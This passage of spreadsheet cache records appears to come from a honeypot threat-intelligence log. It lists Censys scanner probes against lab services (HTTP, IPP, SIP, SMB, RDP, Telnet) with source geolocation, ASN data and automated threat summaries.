    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H23&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_LDAP_H34&amp;&amp;SMA-LAB_IPP_H38&amp;&amp;SMA-LAB_IPP_H21&amp;&amp;SMA-LAB_IPP_H24&amp;&amp;SMA-LAB_IRC_H22&amp;&amp;SMA-LAB_IRC_H8&amp;&amp;SMA-LAB_IPP_H44&amp;&amp;SMA-LAB_POP3_H6&amp;&amp;SMA-LAB_HTTPS_H31&amp;&amp;SMA-LAB_ORACLE_H23&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_LDAP_H2&amp;&amp;SMA-LAB_POSTGRES_H39&amp;&amp;SMA-LAB_SMTP_H33&amp;&amp;SMA-LAB_ORACLE_H15&amp;&amp;SMA-LAB_SIP_H10&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_MYSQL_H33&amp;&amp;SMA-LAB_SIP_H12&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_POSTGRES_H11&amp;&amp;SMA-LAB_REDIS_H19&amp;&amp;SMA-LAB_IMAP_H36&amp;&amp;SMA-LAB_POSTGRES_H44&amp;&amp;SMA-LAB_IPP_H46&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_IMAP_H32&amp;&amp;SMA-LAB_MYSQL_H45&amp;&amp;SMA-LAB_SOCKS5_H33&amp;&amp;SMA-LAB_MYSQL_H41&amp;&amp;SMA-LAB_IPP_H40&amp;&amp;SMA-LAB_LDAP_H9&amp;&amp;SMA-LAB_FTP_H38&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_POSTGRES_H5&amp;&amp;SMA-LAB_POP3_H31&amp;&amp;SMA-LAB_IMAP_H35&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_SMB_H11&amp;&amp;SMA-LAB_IMAP_H41&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_POP3_H4&amp;&amp;SMA-LAB_SOCKS5_H2&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_IRC_H11&amp;&amp;SMA-LAB_ORACLE_H36&amp;&amp;SMA-LAB_MYSQL_H26&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_REDIS_H4&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_RDP_H29&amp;&amp;SMA-LAB_IRC_H40&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_SMTP_H9&amp;&amp;SMA-LAB_POSTGRES_H9&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_SIP_H26&amp;&amp;SMA-LAB_IMAP_H27&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_IPP_H14&amp;&amp;SMA-LAB_POP3_H36&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_ORACLE_H4&amp;&amp;SMA-LAB_POSTGRES_H17&amp;&amp;SMA-LAB_IMAP_H28&amp;&amp;SMA-LAB_SOCKS5_H4&amp;&amp;SMA-LAB_SIP_H21&amp;&amp;SMA-LAB_HTTPS_H18&amp;&amp;SMA-LAB_IRC_H6&amp;&amp;SMA-LAB_ORACLE_H26&amp;&amp;SMA-LAB_SOCKS5_H39&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_IPP_H17&amp;&amp;SMA-LAB_ORACLE_H29&amp;&amp;SMA-LAB_HTTPS_H39&amp;&amp;SMA-LAB_SOCKS5_H34&amp;&amp;SMA-LAB_POP3_H45&amp;&amp;SMA-LAB_IMAP_H12&amp;&amp;SMA-LAB_FTP_H44&amp;&amp;SMA-LAB_IPP_H39&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_IPP_H41&amp;&amp;SMA-LAB_SIP_H15&amp;&amp;SMA-LAB_IMAP_H29&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_MYSQL_H12&amp;&amp;SMA-LAB_SMB_H12&amp;&amp;SMA-LAB_SMB_H21&amp;&amp;SMA-LAB_POP3_H24&amp;&amp;SMA-LAB_FTP_H18&amp;&amp;SMA-LAB_MYSQL_H17&amp;&amp;SMA-LAB_MYSQL_H16&amp;&amp;SMA-LAB_SMB_H28&amp;&amp;SMA-LAB_LDAP_H5&amp;&amp;SMA-LAB_IRC_H45&amp;&amp;SMA-LAB_FTP_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_MSSQL_H38&amp;&amp;SMA-LAB_POSTGRES_H10&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_POP3_H10&amp;&amp;SMA-LAB_ORACLE_H40&amp;&amp;SMA-LAB_IPP_H27&amp;&amp;SMA-LAB_MYSQL_H28&amp;&amp;SMA-LAB_ORACLE_H28&amp;&amp;SMA-LAB_FTP_H35&amp;&amp;SMA-LAB_IRC_H27&amp;&amp;SMA-LAB_SOCKS5_H10&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_IPP_H36&amp;&amp;SMA-LAB_SIP_H24&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_POSTGRES_H28&amp;&amp;SMA-LAB_MYSQL_H46&amp;&amp;SMA-LAB_LDAP_H41&amp;&amp;SMA-LAB_ORACLE_H19&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_POSTGRES_H27&amp;&amp;SMA-LAB_HTTPS_H46&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_POSTGRES_H33&amp;&amp;SMA-LAB_ORACLE_H44&amp;&amp;SMA-LAB_IRC_H35&amp;&amp;SMA-LAB_ORACLE_H27&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_SOCKS5_H21&amp;&amp;SMA-LAB_IMAP_H38&amp;&amp;SMA-LAB_POP3_H21&amp;&amp;SMA-LAB_FTP_H17&amp;&amp;SMA-LAB_HTTPS_H37&amp;&amp;SMA-LAB_FTP_H9&amp;&amp;SMA-LAB_POP3_H46&amp;&amp;SMA-LAB_MYSQL_H29&amp;&amp;SMA-LAB_ORACLE_H14&amp;&amp;SMA-LAB_POSTGRES_H41&amp;&amp;SMA-LAB_HTTPS_H44&amp;&amp;SMA-LAB_IPP_H30&amp;&amp;SMA-LAB_SOCKS5_H9&amp;&amp;SMA-LAB_SMTP_H6&amp;&amp;SMA-LAB_MSSQL_H20"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;80&amp;&amp;389&amp;&amp;631&amp;&amp;6667&amp;&amp;110&amp;&amp;443&amp;&amp;1521&amp;&amp;23&amp;&amp;5432&amp;&amp;25&amp;&amp;NA&amp;&amp;35270&amp;&amp;3306&amp;&amp;6379&amp;&amp;143&amp;&amp;1080&amp;&amp;5900&amp;&amp;64758&amp;&amp;1433&amp;&amp;3389&amp;&amp;42456&amp;&amp;50884&amp;&amp;21&amp;&amp;58622&amp;&amp;43882&amp;&amp;43832"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="MI"/>
    <s v="Michigan"/>
    <s v="Washtenaw"/>
    <s v="Ann Arbor (Old West Side)"/>
    <s v="4984247"/>
    <s v="48104"/>
    <s v="42.2809"/>
    <s v="-83.7489"/>
    <s v="398324"/>
    <s v="Censys, Inc."/>
    <s v="Censys, Inc."/>
    <s v="hosting"/>
    <s v="Censys, Inc"/>
    <s v="2021-09-13"/>
    <s v="CENSY"/>
    <s v="2024-03-29"/>
    <s v="GET&amp;&amp;connection&amp;&amp;query&amp;&amp;stshash&amp;&amp;request&amp;&amp;login&amp;&amp;command&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '185.74.222.213:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://185.74.222.213:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.234.67.80', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.234.67.80', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash='}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.112;rport=58318'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '144', 'Content-Type': 'application/ipp', 'Host': '5.180.55.39:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://5.180.55.39:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_ORACLE:{'local_user': 'None', 'program': 'zgrab2', 'service_name': 'None'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '38.54.117.64:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.54.117.64:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_HTTPS:{'Host': '5.253.43.207:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.253.43.207', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.253.43.207', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.112;rport=53691'}}&amp;&amp;{Data_HTTP:{'Host': '154.26.156.60:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '154.93.37.45:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://154.93.37.45:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.112;rport=57071'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '154.26.156.60:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://154.26.156.60:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '193.57.136.113', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.112;rport=42614'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.181.21.224', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.181.21.224', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.90.63.129', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '109.123.229.33:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://109.123.229.33:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.112,37018)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.112;rport=32770'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:{'Host': '66.94.127.183:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.112,60964)}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.112;rport=43773'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '38.54.79.122:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '66.94.127.183:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://66.94.127.183:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.112,44308)}&amp;&amp;{Data_HTTPS:{'Host': '194.233.76.135:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:{'Host': '109.123.229.33:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': 'vmi1321974.contaboserver.net', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': 'vmi1321974.contaboserver.net', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.112,38466)}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.112,48884)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.79.122', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.79.122', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '203.29.241.98', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.112;rport=44779'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '94.131.113.33:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://94.131.113.33:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.112,43120)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a75e:8a70"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low&amp;&amp;High"/>
    <s v="The observed activity suggests a malicious reconnaissance and scanning of various network services, with potential attempts to exploit vulnerabilities or gain unauthorized access. The attackers are likely using these protocols to gather information about the target system's services, versions, and configurations. &amp;&amp; A suspicious incoming network connection has been detected from IP address 167.94.138.112 to the SMB service, possibly an attempt at unauthorized access or exploitation. This could be a scanning activity or a prelude to a potential security breach through the SMB service. Further investigation is needed to determine the intent and scope of this activity. &amp;&amp; A suspicious SMB connection attempt was made from an external IP address (167.94.138.112) to port 14320. The source IP does not match any known device on the network. This may indicate a potential attack or unauthorized access attempt. &amp;&amp; This suggests that there is currently no recorded malicious activity. &amp;&amp; Unsuccessful attempt to access Redis service, potentially an enumeration or scanning activity for vulnerabilities. The lack of further information suggests the action was likely reconnaissance rather than exploitation. This may be indicative of preparation for future attacks."/>
    <s v="  &amp;&amp; SMB Scan &amp;&amp; SMB Attack"/>
  </r>
  <r>
    <x v="258"/>
    <x v="258"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T05:50:50"/>
    <d v="2025-03-05T12:12:01"/>
    <d v="2025-04-30T05:50:50"/>
    <n v="12"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H43"/>
    <s v="1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JI"/>
    <s v="East Java"/>
    <s v="Kabupaten Trenggalek"/>
    <s v="Trenggalek"/>
    <s v="1623251"/>
    <s v="NA"/>
    <s v="-8.0764"/>
    <s v="111.706"/>
    <s v="150206"/>
    <s v="PT Rafa Teknologi Solusi"/>
    <s v="PT Rafa Teknologi Solusi"/>
    <s v="business"/>
    <s v="PT Rafa Teknologi Solusi"/>
    <s v="2022-09-12"/>
    <s v="IDNIC-RAFATEK-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.249.19.90,64590)}&amp;&amp;{Data_SMB:Incoming connection (103.249.19.90,65183)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67f9:135a"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="259"/>
    <x v="259"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T05:39:36"/>
    <d v="2025-04-30T05:39:36"/>
    <d v="2025-04-30T05:39:36"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
